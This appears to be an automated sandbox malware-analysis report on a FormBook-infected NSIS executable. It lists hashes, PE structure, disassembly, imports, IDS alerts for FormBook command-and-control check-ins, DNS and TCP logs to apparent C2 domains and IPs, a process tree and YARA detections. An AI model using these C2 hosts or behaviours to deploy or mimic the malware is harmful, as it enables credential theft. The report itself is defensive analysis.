                                                Size (bytes):189440
                                                Entropy (8bit):7.99864599001922
                                                Encrypted:true
                                                SSDEEP:3072:plkkjPCMjKvjM3CqAVPQsKZCVbJ55QSX5HBmGwrVhQles+ALw0J/ECp:plZjKGnyqAVoJZmaEPokM0R/p
                                                MD5:ADD9CD4EACD9591A07875B761C8D1640
                                                SHA1:2047C17A31A7E83850DEF3CA6310572957E5D0B2
                                                SHA-256:0AF1AFDA6F616BEB76513577272E0E36EFB99CF8A3718B7725D60C9D88DFBC0B
                                                SHA-512:132281DC01506D09D5C7106105338179A9DB0D50309C94FFBC5E63A7FBF0E6D6DC5B31D26DB93E51FB4C994DA3F8D9B398D2C31F3CF8CF807F111BD9CCF761AC
                                                Malicious:false
                                                Preview:.y..V?......a.v.Nrd....y..8..z....&.t.H...d.F..._..,(...&.....<.1.S..Z......W..5fn]8.....F.......B..+.6.......iw%.G$.....2Y........6..7....v...K.n.7AA.;PY..&cIMd..0..>.$~_p.....)..t.:.x1..r.w.7s....y)..B..6.vf.H..d..;..%....T.o.2....Cl....t.V?..J.i.....=d.)d..e?^..$R...&.t.H"..G.F.....,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_.q.+...)j..t(.c..`\*rXw.7s..N...!..B..WS.vf.H..d!..;..%..<.T.C.2.....l....t.V?..J.i.....Fd..d..e?^..z....&.t.H...d.F..._..,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_p.....)...t(}c...*r.w.7s..N...!..B.W.vf.H..d!..;..%..<.T.C.2.....l....t.V?..J.i.....Fd..d..e?^..z....&.t.H...d.F..._..,(..v&.....T.'.XZ)W..1D.7B..c.u...Y.#..j.......D.4...\..[...#%.G$...........*.....(.......(.>R..<tz..DH..7..a...E 0..>.$~_p.....)...t(}c...*r.w.7s..N...!..B.W.vf.H..d
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.934197714132832
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Lc8xQv8iZY.exe
                                                File size:278807
                                                MD5:30571d64c9a9ed267159fa941a20840c
                                                SHA1:bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
                                                SHA256:85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
                                                SHA512:5c8b708f3540b9347c36722934c8fc56098a94f8362688a8fa712da99e1b8c2564698eb0bed52e226cdfc40cf8b762e1860f6ea9928260e3f0f35bba9cfda82f
                                                SSDEEP:6144:QBn10/UR088uiPuDtJWn42Isu/20+kfAZLrYdwMPTnDMiQH7oPo9:gWLuiPh4rZOH5ZL/MLn4REo9
                                                TLSH:4854236595E0DCF3E6EF5E70AAAB87E6E3B3B0444525D9CAC3608D2F68211C58E1D142
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........
                                                Icon Hash:b2a88c96b2ca6a72
                                                Entrypoint:0x40324f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:ab6770b0a8635b9d92a5838920cfe770
                                                Instruction
                                                sub esp, 00000180h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov dword ptr [esp+14h], 00409130h
                                                xor esi, esi
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B8h]
                                                call dword ptr [004070B4h]
                                                cmp ax, 00000006h
                                                je 00007F51E0A2E4F3h
                                                push ebx
                                                call 00007F51E0A312E1h
                                                cmp eax, ebx
                                                je 00007F51E0A2E4E9h
                                                push 00000C00h
                                                call eax
                                                push 004091E0h
                                                call 00007F51E0A31262h
                                                push 004091D8h
                                                call 00007F51E0A31258h
                                                push 004091CCh
                                                call 00007F51E0A3124Eh
                                                push 0000000Dh
                                                call 00007F51E0A312B1h
                                                push 0000000Bh
                                                call 00007F51E0A312AAh
                                                mov dword ptr [00423F84h], eax
                                                call dword ptr [00407034h]
                                                push ebx
                                                call dword ptr [00407270h]
                                                mov dword ptr [00424038h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+34h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 0041F538h
                                                call dword ptr [00407160h]
                                                push 004091C0h
                                                push 00423780h
                                                call 00007F51E0A30EE1h
                                                call dword ptr [004070B0h]
                                                mov ebp, 0042A000h
                                                push eax
                                                push ebp
                                                call 00007F51E0A30ECFh
                                                push ebx
                                                call dword ptr [00407144h]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                RT_DIALOG0x2d4780x100dataEnglishUnited States
                                                RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                                RT_DIALOG0x2d6980x60dataEnglishUnited States
                                                RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                                RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States
                                                DLLImport
                                                KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                                USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.4162.214.129.14949699802031453 11/30/22-01:25:33.429382TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4162.214.129.14949699802031412 11/30/22-01:25:33.429382TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4206.233.197.13549697802031453 11/30/22-01:25:25.388400TCP2031453ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135
                                                192.168.2.4206.233.197.13549697802031412 11/30/22-01:25:25.388400TCP2031412ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135
                                                192.168.2.4162.214.129.14949699802031449 11/30/22-01:25:33.429382TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969980192.168.2.4162.214.129.149
                                                192.168.2.4206.233.197.13549697802031449 11/30/22-01:25:25.388400TCP2031449ET TROJAN FormBook CnC Checkin (GET)4969780192.168.2.4206.233.197.135
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 30, 2022 01:25:17.361155033 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.493072987 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.493242025 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.530616999 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.662348032 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671255112 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671319962 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671411037 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671453953 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671489000 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671535969 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671556950 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671602964 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671647072 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671689987 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671710014 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671755075 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671791077 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671813011 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.671848059 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:17.671983004 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.672039986 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.672449112 CET4969580192.168.2.4192.185.217.47
                                                Nov 30, 2022 01:25:17.804025888 CET8049695192.185.217.47192.168.2.4
                                                Nov 30, 2022 01:25:22.856251001 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.108297110 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.108417034 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.108675003 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:23.360415936 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608623028 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608676910 CET8049696206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:23.608916998 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:24.117248058 CET4969680192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.133325100 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.388127089 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.388283968 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.388400078 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.642827034 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881593943 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881633997 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:25.881783009 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:25.881913900 CET4969780192.168.2.4206.233.197.135
                                                Nov 30, 2022 01:25:26.136291027 CET8049697206.233.197.135192.168.2.4
                                                Nov 30, 2022 01:25:31.058685064 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.228578091 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.228790045 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.228866100 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.398617983 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.398947954 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.398994923 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399027109 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399061918 CET8049698162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:31.399125099 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:31.399125099 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:32.245378971 CET4969880192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.259099007 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.429162025 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.429264069 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.429382086 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.599260092 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599673986 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599761009 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599796057 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599829912 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:33.599961996 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.599961996 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.600157022 CET4969980192.168.2.4162.214.129.149
                                                Nov 30, 2022 01:25:33.769869089 CET8049699162.214.129.149192.168.2.4
                                                Nov 30, 2022 01:25:38.800184965 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.009787083 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.010145903 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.010220051 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:39.219959974 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220068932 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220103025 CET8049700155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:39.220248938 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:40.026948929 CET4970080192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.041326046 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.266415119 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.267105103 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.267249107 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.493232965 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493326902 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493360043 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:41.493607998 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.512168884 CET4970180192.168.2.4155.159.61.221
                                                Nov 30, 2022 01:25:41.737354040 CET8049701155.159.61.221192.168.2.4
                                                Nov 30, 2022 01:25:54.098124027 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.130537033 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.130795002 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.144684076 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:54.177130938 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177197933 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177283049 CET80497022.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:54.177361965 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:55.156131029 CET4970280192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.167906046 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.204200029 CET80497032.57.90.16192.168.2.4
                                                Nov 30, 2022 01:25:56.204314947 CET4970380192.168.2.42.57.90.16
                                                Nov 30, 2022 01:25:56.204452991 CET4970380192.168.2.42.57.90.16
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 30, 2022 01:25:17.332652092 CET5657253192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:17.350507975 CET53565728.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:22.682940006 CET5091153192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:22.855253935 CET53509118.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:30.889216900 CET5968353192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:31.057456017 CET53596838.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:38.630486965 CET6416753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:38.799020052 CET53641678.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:46.529058933 CET5856553192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:47.344357967 CET53585658.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:48.363827944 CET5223953192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:48.895919085 CET53522398.8.8.8192.168.2.4
                                                Nov 30, 2022 01:25:54.045008898 CET5680753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:25:54.096646070 CET53568078.8.8.8192.168.2.4
                                                Nov 30, 2022 01:26:01.252393007 CET6100753192.168.2.48.8.8.8
                                                Nov 30, 2022 01:26:01.374481916 CET53610078.8.8.8192.168.2.4
                                                Nov 30, 2022 01:26:08.846963882 CET6068653192.168.2.48.8.8.8
                                                Nov 30, 2022 01:26:09.028095007 CET53606868.8.8.8192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 30, 2022 01:25:17.332652092 CET192.168.2.48.8.8.80xb919Standard query (0)www.eufidelizo.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:22.682940006 CET192.168.2.48.8.8.80xf6a5Standard query (0)www.lyonfinancialusa.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:30.889216900 CET192.168.2.48.8.8.80xcf4cStandard query (0)www.afterdarksocial.clubA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:38.630486965 CET192.168.2.48.8.8.80xffbeStandard query (0)www.patrickguarte.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:46.529058933 CET192.168.2.48.8.8.80xb251Standard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:48.363827944 CET192.168.2.48.8.8.80x878eStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.045008898 CET192.168.2.48.8.8.80x55e9Standard query (0)www.brennancorps.infoA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.252393007 CET192.168.2.48.8.8.80xcecdStandard query (0)www.lopezmodeling.comA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:08.846963882 CET192.168.2.48.8.8.80xca60Standard query (0)www.foxwhistle.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 30, 2022 01:25:17.350507975 CET8.8.8.8192.168.2.40xb919No error (0)www.eufidelizo.comeufidelizo.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:25:17.350507975 CET8.8.8.8192.168.2.40xb919No error (0)eufidelizo.com192.185.217.47A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:22.855253935 CET8.8.8.8192.168.2.40xf6a5No error (0)www.lyonfinancialusa.com206.233.197.135A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:31.057456017 CET8.8.8.8192.168.2.40xcf4cNo error (0)www.afterdarksocial.club162.214.129.149A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:38.799020052 CET8.8.8.8192.168.2.40xffbeNo error (0)www.patrickguarte.com155.159.61.221A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:47.344357967 CET8.8.8.8192.168.2.40xb251Server failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:48.895919085 CET8.8.8.8192.168.2.40x878eServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.096646070 CET8.8.8.8192.168.2.40x55e9No error (0)www.brennancorps.infobrennancorps.infoCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:25:54.096646070 CET8.8.8.8192.168.2.40x55e9No error (0)brennancorps.info2.57.90.16A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.374481916 CET8.8.8.8192.168.2.40xcecdNo error (0)www.lopezmodeling.comlopezmodeling.comCNAME (Canonical name)IN (0x0001)false
                                                Nov 30, 2022 01:26:01.374481916 CET8.8.8.8192.168.2.40xcecdNo error (0)lopezmodeling.com192.185.35.86A (IP address)IN (0x0001)false
                                                Nov 30, 2022 01:26:09.028095007 CET8.8.8.8192.168.2.40xca60No error (0)www.foxwhistle.com154.22.100.62A (IP address)IN (0x0001)false
                                                • www.eufidelizo.com
                                                • www.lyonfinancialusa.com
                                                • www.afterdarksocial.club
                                                • www.patrickguarte.com
                                                • www.brennancorps.info
                                                • www.lopezmodeling.com
                                                • www.foxwhistle.com

                                                Click to jump to process

                                                Target ID:0
                                                Start time:01:24:07
                                                Start date:30/11/2022
                                                Path:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Imagebase:0x400000
                                                File size:278807 bytes
                                                MD5 hash:30571D64C9A9ED267159FA941A20840C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Target ID:1
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 54%, ReversingLabs
                                                Reputation:low

                                                Target ID:2
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c72c0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:3
                                                Start time:01:24:09
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
